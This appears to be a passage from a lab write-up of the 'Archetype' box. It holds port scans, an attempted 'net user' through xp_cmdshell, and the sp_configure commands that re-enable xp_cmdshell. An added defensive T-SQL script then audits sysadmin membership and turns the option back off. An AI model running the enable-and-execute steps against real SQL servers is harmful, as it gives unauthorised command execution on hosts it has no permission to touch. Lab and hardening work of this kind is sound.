```
└─$ rustscan -a 10.129.80.176 --ulimit 5000
...
PORT     STATE SERVICE REASON
80/tcp   open  http    syn-ack ttl 127
5985/tcp open  wsman   syn-ack ttl 127   # WinRM
```
```
└─$ nmap 10.129.80.176 -p 80,5985 -sC -sV
...
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
```
└─$ rustscan -a 10.129.128.154 --ulimit 5000
PORT     STATE SERVICE      REASON
135/tcp  open  msrpc        syn-ack ttl 127
139/tcp  open  netbios-ssn  syn-ack ttl 127
445/tcp  open  microsoft-ds syn-ack ttl 127
1433/tcp open  ms-sql-s     syn-ack ttl 127
5985/tcp open  wsman        syn-ack ttl 127
```
```
└─$ nmap 10.129.128.154 -p 135,139,445,1433,5985 -sC -sV
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
|   10.129.128.154:1433:
|     Target_Name: ARCHETYPE
|     NetBIOS_Domain_Name: ARCHETYPE
|     NetBIOS_Computer_Name: ARCHETYPE
|     DNS_Domain_Name: Archetype
|     DNS_Computer_Name: Archetype
|_    Product_Version: 10.0.17763
| ms-sql-info:
|   10.129.128.154:1433:
|     Version:
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-12-11T06:16:46
|_Not valid after:  2054-12-11T06:16:46
|_ssl-date: 2024-12-11T06:28:15+00:00; +1s from scanner time.
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
```
```
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-12-10T22:27:59-08:00
|_clock-skew: mean: 1h36m01s, deviation: 3h34m41s, median: 0s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-12-11T06:27:57
|_  start_date: N/A
```
```
SQL (ARCHETYPE\sql_svc  dbo@master)> EXEC xp_cmdshell 'net user';
ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
```
Enabling xp_cmdshell
```sql
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure;   -- Enabling sp_configure as stated in the above error message
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
```
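The error above makes the control boundary explicit: `xp_cmdshell` is off by default and can only be switched on by a login that holds `ALTER SETTINGS` (which `sysadmin` and `serveradmin` have). The foothold therefore rests on the service login being a `sysadmin` member. The following T-SQL is an added defensive counterpart, not part of the writeup: it lists who holds that role, shows the current state of the command-execution options, and reverts them to the shipped baseline. It assumes you are connected to the same instance with a login that can read `sys.configurations` and run `sp_configure`; the login name `ARCHETYPE\sql_svc` is taken from the session prompt above.

```sql
-- Added defensive script (not from the walkthrough). Assumes sysadmin on the instance.

-- 1. Enumerate sysadmin members. The writeup's technique works only because the
--    service login (ARCHETYPE\sql_svc on this box) appears in this list; a service
--    account normally has no business holding the role.
SELECT r.name AS server_role,
       m.name AS member_login,
       m.type_desc
FROM sys.server_role_members AS rm
JOIN sys.server_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals   AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = N'sysadmin'
ORDER BY m.name;

-- 2. State of the options the walkthrough flips. value_in_use is what the engine is
--    currently running with; value is a pending setting not yet applied by RECONFIGURE.
--    Any row with value_in_use = 1 for xp_cmdshell or Ole Automation Procedures is a finding.
SELECT name, value, value_in_use, is_dynamic, is_advanced
FROM sys.configurations
WHERE name IN (N'xp_cmdshell', N'Ole Automation Procedures', N'show advanced options')
ORDER BY name;

-- 3. Revert to the secure baseline. xp_cmdshell is a dynamic option, so RECONFIGURE
--    applies the change immediately with no service restart.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 4. Verify: expect value_in_use = 0.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = N'xp_cmdshell';
```

Step 3 closes the immediate hole, but step 1 is the one that matters: as long as the login remains in `sysadmin`, anyone who obtains its password can re-run the three `sp_configure` lines from the writeup. Removing the login from the role (`ALTER SERVER ROLE sysadmin DROP MEMBER [ARCHETYPE\sql_svc];`) and granting only the database-level permissions the service actually needs removes the ability to re-enable the option at all.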